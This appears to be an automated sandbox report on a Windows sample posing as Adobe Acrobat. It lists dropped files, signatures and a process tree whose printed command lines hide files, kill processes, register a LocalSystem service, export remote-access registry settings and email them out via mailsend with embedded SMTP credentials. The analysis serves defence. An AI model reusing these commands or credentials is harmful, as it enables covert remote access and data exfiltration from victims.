Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
25/02/2021, 00:37
Static task
static1
Behavioral task
behavioral1
Sample
7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe
Resource
win7v20201028
General
-
Target
7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe
-
Size
5.0MB
-
MD5
24cae17860a840c0317018ef3d607e94
-
SHA1
7595283fd24ebae9f95ea80209d674ca9bd2afcc
-
SHA256
7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c
-
SHA512
bdfe1b899ef55a0ae793e672c190d79161899179d98b0577b5ceda8f02c66376ca0d366c0f087dbb043d30c7ec41a39b0cd2fcc6be4d66639777c6430db3ee82
Malware Config
Signatures
-
Executes dropped EXE 8 IoCs
pid Process 1064 AdobeFP.exe 1780 AdobeFP.exe 1580 AdobeFP.exe 1728 AdobeFP.exe 1068 Acrobat-XI.exe 1688 Acrobat-XI.exe 1524 Acrobat-XI.exe 1616 mailsend.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 5 IoCs
pid Process 1104 cmd.exe 1728 AdobeFP.exe 1728 AdobeFP.exe 1104 cmd.exe 1104 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 27 IoCs
description ioc Process File opened for modification C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\vp8encoder.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\vp8encoder.dll attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmvorbisencoder.dll attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\regedit.reg 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\vp8decoder.dll attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\mailsend.exe 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\install.bat 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmvorbisencoder.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmmux.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmvorbisdecoder.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\mailsend.exe attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\IT.txt attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\vp8decoder.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\regedit.reg attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmmux.dll attrib.exe File created C:\Program Files\Adobe\AdobeAcrobat\IT.txt reg.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmvorbisdecoder.dll attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\regedit.reg attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\install.bat attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\mailsend.exe attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\IT.txt reg.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\install.bat attrib.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 2 IoCs
pid Process 744 timeout.exe 1668 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 1872 taskkill.exe 1756 taskkill.exe 664 taskkill.exe 1724 taskkill.exe -
Runs .reg file with regedit 1 IoCs
pid Process 1464 regedit.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 1064 AdobeFP.exe 1064 AdobeFP.exe 1064 AdobeFP.exe 1064 AdobeFP.exe 1780 AdobeFP.exe 1780 AdobeFP.exe 1580 AdobeFP.exe 1580 AdobeFP.exe 1728 AdobeFP.exe 1728 AdobeFP.exe 1728 AdobeFP.exe 1728 AdobeFP.exe 1068 Acrobat-XI.exe 1616 mailsend.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1524 Acrobat-XI.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 1872 taskkill.exe Token: SeDebugPrivilege 1756 taskkill.exe Token: SeDebugPrivilege 664 taskkill.exe Token: SeDebugPrivilege 1724 taskkill.exe Token: SeDebugPrivilege 1064 AdobeFP.exe Token: SeDebugPrivilege 1580 AdobeFP.exe Token: SeTakeOwnershipPrivilege 1728 AdobeFP.exe Token: SeTcbPrivilege 1728 AdobeFP.exe Token: SeTcbPrivilege 1728 AdobeFP.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1064 AdobeFP.exe 1780 AdobeFP.exe 1580 AdobeFP.exe 1728 AdobeFP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1056 wrote to memory of 1104 1056 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 26 PID 1056 wrote to memory of 1104 1056 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 26 PID 1056 wrote to memory of 1104 1056 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 26 PID 1056 wrote to memory of 1104 1056 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 26 PID 1056 wrote to memory of 1104 1056 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 26 PID 1056 wrote to memory of 1104 1056 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 26 PID 1056 wrote to memory of 1104 1056 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 26 PID 1104 wrote to memory of 1300 1104 cmd.exe 28 PID 1104 wrote to memory of 1300 1104 cmd.exe 28 PID 1104 wrote to memory of 1300 1104 cmd.exe 28 PID 1104 wrote to memory of 1300 1104 cmd.exe 28 PID 1104 wrote to memory of 1168 1104 cmd.exe 29 PID 1104 wrote to memory of 1168 1104 cmd.exe 29 PID 1104 wrote to memory of 1168 1104 cmd.exe 29 PID 1104 wrote to memory of 1168 1104 cmd.exe 29 PID 1104 wrote to memory of 1952 1104 cmd.exe 30 PID 1104 wrote to memory of 1952 1104 cmd.exe 30 PID 1104 wrote to memory of 1952 1104 cmd.exe 30 PID 1104 wrote to memory of 1952 1104 cmd.exe 30 PID 1104 wrote to memory of 1704 1104 cmd.exe 32 PID 1104 wrote to memory of 1704 1104 cmd.exe 32 PID 1104 wrote to memory of 1704 1104 cmd.exe 32 PID 1104 wrote to memory of 1704 1104 cmd.exe 32 PID 1104 wrote to memory of 1872 1104 cmd.exe 33 PID 1104 wrote to memory of 1872 1104 cmd.exe 33 PID 1104 wrote to memory of 1872 1104 cmd.exe 33 PID 1104 wrote to memory of 1872 1104 cmd.exe 33 PID 1104 wrote to memory of 1756 1104 cmd.exe 38 PID 1104 wrote to memory of 1756 1104 cmd.exe 38 PID 1104 wrote to memory of 1756 1104 cmd.exe 38 PID 1104 wrote to memory of 1756 1104 cmd.exe 38 PID 1104 wrote to memory of 664 1104 cmd.exe 39 PID 1104 wrote to memory of 664 1104 cmd.exe 39 PID 1104 wrote to memory of 664 1104 cmd.exe 39 PID 1104 wrote to memory of 664 1104 cmd.exe 39 PID 1104 wrote to memory of 1724 1104 cmd.exe 40 PID 1104 wrote to memory of 1724 1104 cmd.exe 40 PID 1104 wrote to memory of 1724 1104 cmd.exe 40 PID 1104 wrote to memory of 1724 1104 cmd.exe 40 PID 1104 wrote to memory of 1596 1104 cmd.exe 41 PID 1104 wrote to memory of 1596 1104 cmd.exe 41 PID 1104 wrote to memory of 1596 1104 cmd.exe 41 PID 1104 wrote to memory of 1596 1104 cmd.exe 41 PID 1104 wrote to memory of 1572 1104 cmd.exe 42 PID 1104 wrote to memory of 1572 1104 cmd.exe 42 PID 1104 wrote to memory of 1572 1104 cmd.exe 42 PID 1104 wrote to memory of 1572 1104 cmd.exe 42 PID 1104 wrote to memory of 1064 1104 cmd.exe 43 PID 1104 wrote to memory of 1064 1104 cmd.exe 43 PID 1104 wrote to memory of 1064 1104 cmd.exe 43 PID 1104 wrote to memory of 1064 1104 cmd.exe 43 PID 1104 wrote to memory of 1780 1104 cmd.exe 44 PID 1104 wrote to memory of 1780 1104 cmd.exe 44 PID 1104 wrote to memory of 1780 1104 cmd.exe 44 PID 1104 wrote to memory of 1780 1104 cmd.exe 44 PID 1104 wrote to memory of 1464 1104 cmd.exe 45 PID 1104 wrote to memory of 1464 1104 cmd.exe 45 PID 1104 wrote to memory of 1464 1104 cmd.exe 45 PID 1104 wrote to memory of 1464 1104 cmd.exe 45 PID 1104 wrote to memory of 1520 1104 cmd.exe 46 PID 1104 wrote to memory of 1520 1104 cmd.exe 46 PID 1104 wrote to memory of 1520 1104 cmd.exe 46 PID 1104 wrote to memory of 1520 1104 cmd.exe 46 PID 1104 wrote to memory of 1212 1104 cmd.exe 47 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1168 attrib.exe 1952 attrib.exe 1704 attrib.exe 604 attrib.exe 2020 attrib.exe 1664 attrib.exe 744 attrib.exe 1300 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe"C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Program Files\Adobe\AdobeAcrobat\install.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat"3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1300
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\*.*"3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1168
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs"3⤵
- Views/modifies file attributes
PID:1952
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs\*.*"3⤵
- Views/modifies file attributes
PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rfusclient.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rutserv.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Acrobat-XI.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im AdobeFP.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\SysWOW64\sc.exesc delete AdobeReader3⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Hardware Driver\LocalDisk" /f3⤵PID:1572
-
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /silentinstall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1064
-
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /firewall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1780
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Program Files\Adobe\AdobeAcrobat\regedit.reg"3⤵
- Runs .reg file with regedit
PID:1464
-
-
C:\Windows\SysWOW64\sc.exesc failure AdobeReader reset= 0 actions= restart/1000/restart/1000/restart/10003⤵PID:1520
-
-
C:\Windows\SysWOW64\sc.exesc config AdobeReader obj= LocalSystem type= interact type= own3⤵PID:1212
-
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /start3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1580
-
-
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:744
-
-
C:\Windows\SysWOW64\reg.exereg export "HKLM\SYSTEM\Hardware Driver\LocalDisk\v4\Server\Parameters" "IT.txt"3⤵
- Drops file in Program Files directory
PID:1212
-
-
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:1668
-
-
C:\Program Files\Adobe\AdobeAcrobat\mailsend.exemailsend.exe -t [email protected] -attach IT.txt,application/txt -sub "RMS ID" -smtp smtp.mail.ru -port 465 -f [email protected] -name "RMS ToktonIT" -ssl -auth-login -user [email protected] -pass hT*euyAyCT43 -q3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1616
-
-
C:\Windows\SysWOW64\attrib.exeattrib "regedit.reg" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:604
-
-
C:\Windows\SysWOW64\attrib.exeattrib "install.bat" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2020
-
-
C:\Windows\SysWOW64\attrib.exeattrib "IT.txt" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1664
-
-
C:\Windows\SysWOW64\attrib.exeattrib "mailsend.exe" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:744
-
-
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1728 -
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1068 -
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1524
-
-
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray2⤵
- Executes dropped EXE
PID:1688
-